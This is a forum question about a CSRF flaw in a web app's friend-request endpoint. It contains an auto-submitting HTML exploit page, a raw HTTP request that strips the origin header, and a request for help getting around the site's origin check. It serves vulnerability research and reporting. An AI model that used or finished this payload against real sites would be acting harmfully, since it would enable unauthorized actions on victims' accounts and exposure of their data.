I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a
POST request. Using usual exploitation techniques, I crafted the following webpage.
<html> <head></head> <body> <span>csrf test</span> <form action="http://vulnerable.com/friendRequest.asp" method="POST"> <input type="hidden" name="MessageArea" value="this is a test of csrf"> <input type="hidden" name="FriendName" value="testuser"> </form> <script> document.forms(0).submit(); </script> </body> </html>
Unfortunately though, the website checks for the
origin header in the request, so this payload doesn’t work. Switching to a
GET request and deleting the
origin header actually sends the request successfully. The request looks like the following.
GET /friendRequest.asp HTTP/1.1 Host: www.vulnerable.com User-Agent: Mozilla/5.0 ... (no origin header) Cookie: secret_cookie MessageArea=this+is+a+test+for+csrf&FriendName=testuser
As you can see this is a
GET request with
POST data sent at the bottom. Unfortunately the request doesn’t go through with the parameters in the URL like in a true
GET request. Is there any way to use an external form (like the one above) to send a malformed
GET request with POST data to achieve this
CSRF? I have looked into
fetch but I’m not sure that they are the right tools for the job.